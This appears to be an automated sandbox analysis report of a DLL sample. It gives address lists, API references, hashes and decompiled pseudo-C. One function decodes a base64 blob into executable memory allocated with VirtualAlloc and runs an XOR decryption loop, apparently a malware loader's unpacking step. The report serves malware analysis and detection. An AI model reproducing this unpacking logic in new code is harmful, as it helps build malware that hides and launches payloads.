0x6da56175
0x6da56176
0x6da56177
0x6da56178
0x6da56179
0x6da5617a
0x6da5617b
0x6da5617c
0x6da5617d
0x6da5617e
0x6da5617f
0x6da56180
0x6da56183
0x6da56186
0x6da56187
0x6da56189
0x6da56190
0x6da56191
0x6da56194
0x6da56199
0x6da5619c
0x6da5619d
0x6da5619f
0x6da562c9
0x00000000
0x6da561a5
0x6da561a5
0x6da561a8
0x6da561ad
0x6da561b0
0x6da561b3
0x6da561b6
0x6da561b8
0x6da561e2
0x6da561e4
0x6da561e6
0x6da561e8
0x6da561f1
0x6da561f3
0x6da561f5
0x6da561f8
0x6da561f8
0x6da561fb
0x6da56201
0x6da56210
0x6da56212
0x6da56224
0x6da56224
0x6da56214
0x6da56215
0x6da5621a
0x6da5621d
0x6da56220
0x6da56220
0x00000000
0x6da56203
0x6da56203
0x6da56203
0x6da56206
0x6da56208
0x6da562ce
0x6da562ce
0x00000000
0x6da5620e
0x00000000
0x6da5620e
0x6da56208
0x6da561ea
0x6da561ea
0x00000000
0x6da561ea
0x6da561ba
0x6da561ba
0x6da561bc
0x6da561bc
0x6da561c1
0x6da561c2
0x6da561c7
0x6da561ca
0x6da561cc
0x6da562d3
0x6da562d3
0x6da562d8
0x6da562d9
0x6da562da
0x6da562db
0x6da562dc
0x6da562dd
0x6da562de
0x6da562df
0x6da562e0
0x6da562e2
0x6da562e4
0x00000000
0x6da562ea
0x6da562ec
0x6da561d2
0x6da561d2
0x6da561d5
0x6da561d8
0x6da561db
0x6da56226
0x6da56229
0x6da56236
0x6da56239
0x6da5623e
0x6da56241
0x6da56245
0x6da56248
0x6da56249
0x6da562a0
0x6da562a1
0x6da562a2
0x6da562ae
0x6da562b9
0x6da562be
0x6da562c6
0x6da5624b
0x6da5624b
0x6da5624d
0x6da5624e
0x6da5624f
0x6da5625d
0x6da5626b
0x6da5626c
0x6da5626f
0x6da56275
0x6da56289
0x6da56289
0x6da5628b
0x6da56293
0x6da5629d
0x6da56277
0x6da56277
0x6da5627a
0x6da5627f
0x6da56282
0x6da56285
0x00000000
0x6da56287
0x6da56287
0x00000000
0x6da56287
0x6da56285
0x6da56275
0x6da56249
0x6da561cc
0x6da561b8
0x6da56052
0x6da56052
0x6da56055
0x6da56058
0x6da560a0
0x6da560a6
0x6da560b0
0x6da560b6
0x6da560b9
0x6da560bf
0x6da560c4
0x6da560c7
0x6da560cb
0x6da560ce
0x6da560cf
0x6da56131
0x6da56132
0x6da56133
0x6da5613f
0x6da5614a
0x6da56150
0x6da56158
0x6da56162
0x6da560d1
0x6da560d1
0x6da560d3
0x6da560d4
0x6da560d5
0x6da560e3
0x6da560f4
0x6da560fc
0x6da560ff
0x6da56100
0x6da56106
0x6da5611a
0x6da5611a
0x6da5611c
0x6da56124
0x6da5612e
0x6da56108
0x6da56108
0x6da5610b
0x6da5610e
0x6da56110
0x6da56113
0x6da56116
0x00000000
0x6da56118
0x6da56118
0x00000000
0x6da56118
0x6da56116
0x6da56106
0x6da560cf
0x6da5604c
0x6da56038
0x6da55ef2
0x6da55ef2
0x6da55ef5
0x6da55ef8
0x6da55efb
0x6da55f46
0x6da55f49
0x6da55f4f
0x6da55f52
0x6da55f57
0x6da55f5a
0x6da55f5e
0x6da55f61
0x6da55f62
0x6da55fb9
0x6da55fba
0x6da55fbb
0x6da55fc7
0x6da55fd2
0x6da55fd7
0x6da55fdf
0x6da55f64
0x6da55f64
0x6da55f66
0x6da55f67
0x6da55f68
0x6da55f76
0x6da55f7e
0x6da55f84
0x6da55f85
0x6da55f88
0x6da55f8e
0x6da55fa2
0x6da55fa2
0x6da55fa4
0x6da55fac
0x6da55fb6
0x6da55f90
0x6da55f90
0x6da55f93
0x6da55f96
0x6da55f98
0x6da55f9b
0x6da55f9e
0x00000000
0x6da55fa0
0x6da55fa0
0x00000000
0x6da55fa0
0x6da55f9e
0x6da55f8e
0x6da55f62
0x6da55eec
0x6da55ed8
0x6da55e50
0x6da55e50
0x6da55e53
0x6da55e57
0x6da55e5b
0x6da55e67
0x6da55e6a
0x00000000
0x6da55e6a
0x6da55e38
0x6da55e38
0x00000000
0x6da55e38
0x6da55e2a
0x6da55e2d
0x00000000
0x6da55e2d
0x6da55e28
0x6da55e1e
0x6da55e14
0x6da55d34
0x6da55d39
0x6da55d41
0x6da55d4b
0x6da55d51
0x6da55d56
0x6da55d5a
0x6da55d5e
0x6da55d6a
0x6da55d6d
0x00000000
0x6da55d6d
0x6da55cbe
0x6da55cbe
0x00000000
0x6da55cbe
0x6da55cb0
0x6da55cb3
0x00000000
0x6da55cb3
0x6da55cae
0x6da55c83
0x6da55c83
0x6da55c86
0x6da55c93
0x6da55c9d
0x6da55c9d
0x6da55c81

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DA55C23
std::_Lockit::_Lockit.LIBCPMT ref: 6DA55C43
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55C63
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55C86
std::_Lockit::_Lockit.LIBCPMT ref: 6DA55CF1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA55D39
std::_Facet_Register.LIBCPMT ref: 6DA55D5E

Strings

bad locale name, xrefs: 6DA55D78

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 1197013505-1405518554
Opcode ID: 000fedabade8f24075d45906e81f2e433d7a8fa815216bac5eaf84597786e985
Instruction ID: ef6a5bf3ff850a58946c6374b3392adc5c311f237e6789aca00353238709c391
Opcode Fuzzy Hash: 000fedabade8f24075d45906e81f2e433d7a8fa815216bac5eaf84597786e985
Instruction Fuzzy Hash: 3041CD7591C249DFCB11CFA8CA80BAEBBB4FF05710F1A8159D448AB341DB30A992CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA591AF Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6DA591F8
__alloca_probe_16.LIBCMT ref: 6DA59224
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6DA59263
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA59280
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6DA592BF
__alloca_probe_16.LIBCMT ref: 6DA592DC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA5931E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DA59341

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 0c81232c2beb5ccf7d9eeae99bea8b8bfaaaf6536af0a4d4adcd866edc078516
Instruction ID: 3c0104bea5dd7bcbc3642ecf5e022e38469cf305a3862b1f315443b4e7241e06
Opcode Fuzzy Hash: 0c81232c2beb5ccf7d9eeae99bea8b8bfaaaf6536af0a4d4adcd866edc078516
Instruction Fuzzy Hash: 4C51C3B6508216EFEF104F54CE44FAF3BB9EF49760F154428F9249A190D738D8A1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA51B10 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 257
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DA51B10() {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v16;
				intOrPtr _v24;
				intOrPtr _v29;
				unsigned int _v30;
				signed char _v32;
				signed char _v33;
				signed int _v38;
				signed int _v39;
				signed int _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				void* _v92;
				char _v100;
				char _v164;
				void* __ebx;
				void* __edi;
				char _t99;
				intOrPtr _t100;
				intOrPtr _t103;
				signed char _t107;
				signed char _t108;
				void* _t116;
				void* _t119;
				intOrPtr _t131;
				intOrPtr _t136;
				void* _t146;
				signed int* _t151;
				void* _t153;
				signed char _t157;
				void* _t159;
				void* _t174;
				signed int _t176;
				void* _t181;
				intOrPtr _t200;
				unsigned char _t206;
				void* _t208;
				void* _t210;
				void* _t212;
				signed int _t213;
				void* _t216;
				void* _t218;
				intOrPtr* _t219;
				signed int _t220;
				void* _t222;
				intOrPtr _t225;
				void* _t229;
				intOrPtr _t232;
				void* _t233;

				_t159 = _t229;
				_t232 = (_t229 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t159 + 4));
				_t225 = _t232;
				_push(0xffffffff);
				_push(E6DA72345);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t232;
				_push(_t159);
				_t233 = _t232 - 0x88;
				asm("movups xmm0, [0x6da7f258]");
				_t99 =  *0x6da7f298; // 0x0
				asm("movups [ebp-0x98], xmm0");
				asm("movups xmm0, [0x6da7f268]");
				_v100 = _t99;
				_t100 =  *0x6daa4884; // 0x20e6c
				asm("movups [ebp-0x88], xmm0");
				asm("movups xmm0, [0x6da7f278]");
				asm("movups [ebp-0x78], xmm0");
				asm("movups xmm0, [0x6da7f288]");
				asm("movups [ebp-0x68], xmm0");
				_t195 = VirtualAlloc(0, _t100 + _t100, 0x3000, 0x40);
				_t210 = 0;
				_t103 =  *0x6daa4884; // 0x20e6c
				_t216 = 0;
				_v64 = _t195;
				_v44 = 0;
				if(_t103 == 0) {
					L27:
					 *0x6daa4884 = _t210;
					 *[fs:0x0] = _v24;
					return _v64;
				} else {
					_t6 = _t195 + 2; // 0x2
					_t164 = _t6;
					_v60 = _t6;
					while(1) {
						_v68 = _t103 - 1;
						_t107 =  *( *(_t159 + 8));
						_v33 = _t107;
						if(_t107 == 0x3d) {
							break;
						}
						_t119 = E6DA5DB50(_t159, _t164, _t195, _t107 & 0x000000ff);
						_t233 = _t233 + 4;
						if(_t119 != 0) {
							L6:
							_v56 = 0;
							_v52 = 0;
							_v48 = 0;
							_v16 = 0;
							_push(0xd);
							_v92 = 0;
							_v76 = 0;
							_v72 = 0xf;
							_v92 = 0;
							E6DA51770( &_v92, "dfxsgdfhdgfjh");
							_v16 = 1;
							_t174 =  &_v56;
							E6DA52160(_t159, _t174, _t210, 0,  &_v92);
							_v16 = 0;
							_t200 = _v72;
							if(_t200 < 0x10) {
								L10:
								_t210 = _v56;
								_t195 = _v52;
								_push(_t174);
								E6DA52340(_t210, _v52, _t210);
								_t176 =  *(_t159 + 8);
								_t233 = _t233 + 4;
								_v52 = _t210;
								_t164 = _t176 + 1;
								 *((char*)(_t225 + _t216 - 0x14)) =  *_t176;
								_t216 = _t216 + 1;
								 *(_t159 + 8) = _t164;
								if(_t216 == 4) {
									_t222 = 0;
									do {
										_t146 = E6DA5A950( &_v164,  *((char*)(_t225 + _t222 - 0x14)));
										_t233 = _t233 + 8;
										 *((char*)(_t225 + _t222 - 0x14)) = _t146 -  &_v164;
										_t222 = _t222 + 1;
									} while (_t222 < 4);
									_t206 = _v30;
									_v44 = _v44 + 3;
									_t195 = (_t206 << 6) + _v29;
									_t164 = (_t206 >> 0x00000002 & 0x0000000f) + (_v32 << 4);
									_t151 = _v60;
									_v40 = _t164;
									_v39 = _t164;
									_v38 = _t195;
									 *(_t151 - 2) = _t164;
									 *(_t151 - 1) = _t164;
									 *_t151 = _t195;
									_v60 =  &(_t151[0]);
									_t216 = 0;
								}
								_v16 = 0xffffffff;
								if(_t210 == 0) {
									L18:
									_t103 = _v68;
									if(_t103 != 0) {
										continue;
									} else {
										break;
									}
								} else {
									_push(_t164);
									E6DA52340(_t210, _t210, _t210);
									_t233 = _t233 + 4;
									_t195 = 0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2;
									_t131 = _t210;
									_t164 = (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2) + ((0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2)) * 2 << 3;
									if(_t164 < 0x1000) {
										L17:
										_push(_t164);
										E6DA593C9(_t210);
										_t233 = _t233 + 8;
										_v56 = 0;
										_v52 = 0;
										_v48 = 0;
										goto L18;
									} else {
										_t210 =  *((intOrPtr*)(_t210 - 4));
										_t164 = _t164 + 0x23;
										if(_t131 - _t210 + 0xfffffffc > 0x1f) {
											goto L28;
										} else {
											goto L17;
										}
									}
								}
							} else {
								_t174 = _v92;
								_t208 = _t200 + 1;
								_t153 = _t174;
								if(_t208 < 0x1000) {
									L9:
									_push(_t208);
									E6DA593C9(_t174);
									_t233 = _t233 + 8;
									goto L10;
								} else {
									_t164 =  *(_t174 - 4);
									_t195 = _t208 + 0x23;
									if(_t153 -  *(_t174 - 4) + 0xfffffffc > 0x1f) {
										L28:
										E6DA5DACF(_t159, _t164, _t195);
										asm("int3");
										asm("int3");
										_push(_t225);
										_push(_t216);
										_t219 = _v164;
										_push(_t210);
										_t181 = _t219 + 1;
										do {
											_t136 =  *_t219;
											_t219 = _t219 + 1;
										} while (_t136 != 0);
										_t213 = 0;
										_t220 = _t219 - _t181;
										if(_v4 > 0) {
											_push(_t159);
											do {
												if(_t213 == (0x10624dd3 * _t213 >> 0x20 >> 6) * 0x3e8) {
													Sleep(2);
												}
												asm("cdq");
												 *(_t213 + 0x6da83a18) =  *(_t213 + 0x6da83a18) ^  *(_t213 % _t220 + _v0);
												_t213 = _t213 + 1;
											} while (_t213 < _v4);
										}
										return 0x6da83a18;
									} else {
										goto L9;
									}
								}
							}
						} else {
							_t157 = _v33;
							if(_t157 == 0x2b || _t157 == 0x2f) {
								goto L6;
							} else {
								DebugBreak();
								break;
							}
						}
						goto L38;
					}
					if(_t216 == 0) {
						_t210 = _v44;
					} else {
						_t212 = 0;
						if(_t216 > 0) {
							do {
								_t116 = E6DA5A950( &_v164,  *((char*)(_t225 + _t212 - 0x14)));
								_t233 = _t233 + 8;
								 *((char*)(_t225 + _t212 - 0x14)) = _t116 -  &_v164;
								_t212 = _t212 + 1;
							} while (_t212 < _t216);
						}
						_t108 = _v32;
						_t218 = _t216 - 1;
						_t210 = _v44;
						_v40 = (_t108 >> 0x00000004 & 0x00000003) + (_t108 << 2);
						_v39 = (_v30 >> 0x00000002 & 0x0000000f) + (_t108 << 4);
						if(_t218 > 0) {
							E6DA5AB10(_v64 + _t210,  &_v40, _t218);
							_t210 = _t210 + _t218;
						}
					}
					goto L27;
				}
				L38:
			}

0x6da51b11
0x6da51b19
0x6da51b20
0x6da51b24
0x6da51b26
0x6da51b28
0x6da51b33
0x6da51b34
0x6da51b3b
0x6da51b3c
0x6da51b42
0x6da51b49
0x6da51b4f
0x6da51b57
0x6da51b5e
0x6da51b61
0x6da51b66
0x6da51b6f
0x6da51b7d
0x6da51b82
0x6da51b8b
0x6da51b95
0x6da51b97
0x6da51b99
0x6da51b9e
0x6da51ba0
0x6da51ba3
0x6da51ba8
0x6da51e1b
0x6da51e21
0x6da51e28
0x6da51e36
0x6da51bae
0x6da51bae
0x6da51bae
0x6da51bb1
0x6da51bb4
0x6da51bb5
0x6da51bbb
0x6da51bbd
0x6da51bc2
0x00000000
0x00000000
0x6da51bcc
0x6da51bd1
0x6da51bd6
0x6da51be7
0x6da51be7
0x6da51bee
0x6da51bf5
0x6da51bfc
0x6da51c06
0x6da51c08
0x6da51c14
0x6da51c1b
0x6da51c22
0x6da51c26
0x6da51c2e
0x6da51c35
0x6da51c38
0x6da51c3d
0x6da51c41
0x6da51c47
0x6da51c75
0x6da51c75
0x6da51c78
0x6da51c7b
0x6da51c7e
0x6da51c83
0x6da51c86
0x6da51c89
0x6da51c8e
0x6da51c8f
0x6da51c93
0x6da51c94
0x6da51c9a
0x6da51c9c
0x6da51ca0
0x6da51cad
0x6da51cb8
0x6da51cbd
0x6da51cc1
0x6da51cc2
0x6da51ccc
0x6da51cd1
0x6da51cf0
0x6da51cf3
0x6da51cf5
0x6da51cf8
0x6da51cfb
0x6da51cfe
0x6da51d01
0x6da51d04
0x6da51d07
0x6da51d0c
0x6da51d0f
0x6da51d0f
0x6da51d11
0x6da51d1a
0x6da51d82
0x6da51d82
0x6da51d87
0x00000000
0x00000000
0x00000000
0x00000000
0x6da51d1c
0x6da51d1c
0x6da51d21
0x6da51d30
0x6da51d35
0x6da51d42
0x6da51d44
0x6da51d4d
0x6da51d63
0x6da51d63
0x6da51d65
0x6da51d6a
0x6da51d6d
0x6da51d74
0x6da51d7b
0x00000000
0x6da51d4f
0x6da51d4f
0x6da51d52
0x6da51d5d
0x00000000
0x00000000
0x00000000
0x00000000
0x6da51d5d
0x6da51d4d
0x6da51c49
0x6da51c49
0x6da51c4c
0x6da51c4d
0x6da51c55
0x6da51c6b
0x6da51c6b
0x6da51c6d
0x6da51c72
0x00000000
0x6da51c57
0x6da51c57
0x6da51c5a
0x6da51c65
0x6da51e39
0x6da51e39
0x6da51e3e
0x6da51e3f
0x6da51e40
0x6da51e43
0x6da51e44
0x6da51e47
0x6da51e48
0x6da51e50
0x6da51e50
0x6da51e52
0x6da51e53
0x6da51e57
0x6da51e59
0x6da51e5e
0x6da51e60
0x6da51e67
0x6da51e7b
0x6da51e7f
0x6da51e7f
0x6da51e86
0x6da51e8c
0x6da51e92
0x6da51e93
0x6da51e98
0x6da51ea1
0x00000000
0x00000000
0x00000000
0x6da51c65
0x6da51c55
0x6da51bd8
0x6da51bd8
0x6da51bdd
0x00000000
0x6da51e0d
0x6da51e0d
0x00000000
0x6da51e0d
0x6da51bdd
0x00000000
0x6da51bd6
0x6da51d8f
0x6da51e18
0x6da51d95
0x6da51d95
0x6da51d99
0x6da51da0
0x6da51dad
0x6da51db8
0x6da51dbd
0x6da51dc1
0x6da51dc2
0x6da51da0
0x6da51dc6
0x6da51dc9
0x6da51dca
0x6da51dec
0x6da51def
0x6da51df4
0x6da51e01
0x6da51e09
0x6da51e09
0x6da51df4
0x00000000
0x6da51d8f
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,00020E6C,00003000,00000040,00000000), ref: 6DA51B8F
___from_strstr_to_strchr.LIBCMT ref: 6DA51CAD
___from_strstr_to_strchr.LIBCMT ref: 6DA51DAD
DebugBreak.KERNEL32 ref: 6DA51E0D

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 6DA51B42
dfxsgdfhdgfjh, xrefs: 6DA51C0F

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ___from_strstr_to_strchr$AllocBreakDebugVirtual
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$dfxsgdfhdgfjh
API String ID: 948567615-1324637814
Opcode ID: abcdd632436bf5c45885edbfc83709ac4987403e3b3094a8e2ae16329e79d4db
Instruction ID: bd2d9a6fae8034a7b57a79ca8a50b62d29cd2494d4c3c7c4187b095f652b35f8
Opcode Fuzzy Hash: abcdd632436bf5c45885edbfc83709ac4987403e3b3094a8e2ae16329e79d4db
Instruction Fuzzy Hash: C1A17C76D0C2589BDF01CFA8C9907FEBBB4AF6A304F094258D9446B382D7345695CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA66512 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA66512(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6daa5a60 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6da77930 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6daa5a60 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6daa5a60 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6DA62838(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6DA62838(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x6da6651b
0x6da665b0
0x6da66523
0x6da66525
0x6da6652f
0x6da66534
0x6da66541
0x6da66556
0x6da6655a
0x6da665c0
0x6da665c5
0x6da665cc
0x6da665d0
0x6da665d3
0x6da665d3
0x6da665d9
0x6da665d9
0x6da665bb
0x6da665bf
0x6da665bf
0x6da6655c
0x6da66565
0x6da6659e
0x6da665ab
0x6da665ad
0x6da665ad
0x00000000
0x6da665ad
0x6da6656f
0x6da66574
0x6da66579
0x00000000
0x00000000
0x6da66583
0x6da66588
0x6da6658d
0x00000000
0x00000000
0x6da66592
0x6da66598
0x6da6659c
0x00000000
0x00000000
0x00000000
0x6da6659c
0x6da66539
0x00000000
0x00000000
0x00000000
0x6da6653f
0x6da665b9
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,6DA6661F,6DA524BD,?,?,00000000,?,?,6DA667EC,00000021,FlsSetValue,6DA77F50,6DA77F58,?), ref: 6DA665D3

Strings

api-ms-, xrefs: 6DA66569
ext-ms-, xrefs: 6DA6657D

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0f49008cb283c2a68a02711db62cfcf9aee74d7a190ad587a38daef5ed8fcae3
Instruction ID: e34556b26958bf199191635601d9f559951dcf90597a29a26232a38bd4038556
Opcode Fuzzy Hash: 0f49008cb283c2a68a02711db62cfcf9aee74d7a190ad587a38daef5ed8fcae3
Instruction Fuzzy Hash: E4210E79A0C355D7CB119A14CC5576A3779FF46360B1D4190E91597384F770EA81C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA55D90 Relevance: 9.1, APIs: 6, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6DA55D90(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v80;
				void* _t132;
				void* _t148;
				signed int _t151;
				unsigned int _t153;
				void* _t154;
				signed int _t169;
				signed int* _t171;
				signed int _t172;
				unsigned int _t174;
				void* _t175;
				signed int _t178;
				signed int _t193;
				signed int* _t195;
				signed int _t196;
				unsigned int _t198;
				void* _t199;
				signed int _t213;
				signed int* _t215;
				void* _t218;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int* _t228;
				signed int* _t229;
				signed int* _t230;
				signed int* _t239;
				signed int* _t245;
				void* _t247;
				void* _t254;
				void* _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				unsigned int _t268;
				signed int _t269;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t286;
				unsigned int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t306;
				void* _t308;
				void* _t309;
				intOrPtr _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t339;

				_t306 = _t317;
				_push(0xffffffff);
				_push(E6DA72685);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t317;
				_t318 = _t317 - 0xc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E6DA588D6( &_v28, 0);
				_v8 = 0;
				_t266 =  *0x6daa5cb8; // 0x0
				_t226 =  *0x6daa5c78; // 0x0
				_v20 = _t226;
				if(_t266 == 0) {
					E6DA588D6( &_v24, _t266);
					_t339 =  *0x6daa5cb8 - _t266; // 0x0
					if(_t339 == 0) {
						_t223 =  *0x6daa5048; // 0x0
						_t224 = _t223 + 1;
						 *0x6daa5048 = _t224;
						 *0x6daa5cb8 = _t224;
					}
					E6DA5892E( &_v24);
					_t266 =  *0x6daa5cb8; // 0x0
				}
				_t239 =  *(_a4 + 4);
				if(_t266 >= _t239[3]) {
					_t280 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t280 =  *(_t239[2] + _t266 * 4);
					if(_t280 != 0) {
						L16:
						E6DA5892E( &_v28);
						 *[fs:0x0] = _v16;
						return _t280;
					} else {
						L8:
						if(_t239[5] == 0) {
							L11:
							if(_t280 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t218 = E6DA58AB3();
							if(_t266 >=  *((intOrPtr*)(_t218 + 0xc))) {
								L12:
								if(_t226 == 0) {
									_t132 = E6DA562F0(_t226, _t266,  &_v20, _a4);
									_t320 = _t318 + 8;
									__eflags = _t132 - 0xffffffff;
									if(__eflags == 0) {
										E6DA52950();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t306);
										_t308 = _t320;
										_t321 = _t320 - 8;
										_push(_t226);
										_t228 = _t239;
										_t242 = 0x7fffffff;
										_push(_t280);
										_t282 = _v32;
										_t261 = _t228[4];
										_v44 = _t261;
										_push(_t266);
										__eflags = 0x7fffffff - _t261 - _t282;
										if(__eflags < 0) {
											E6DA514C0(_t228, 0x7fffffff, _t261, __eflags);
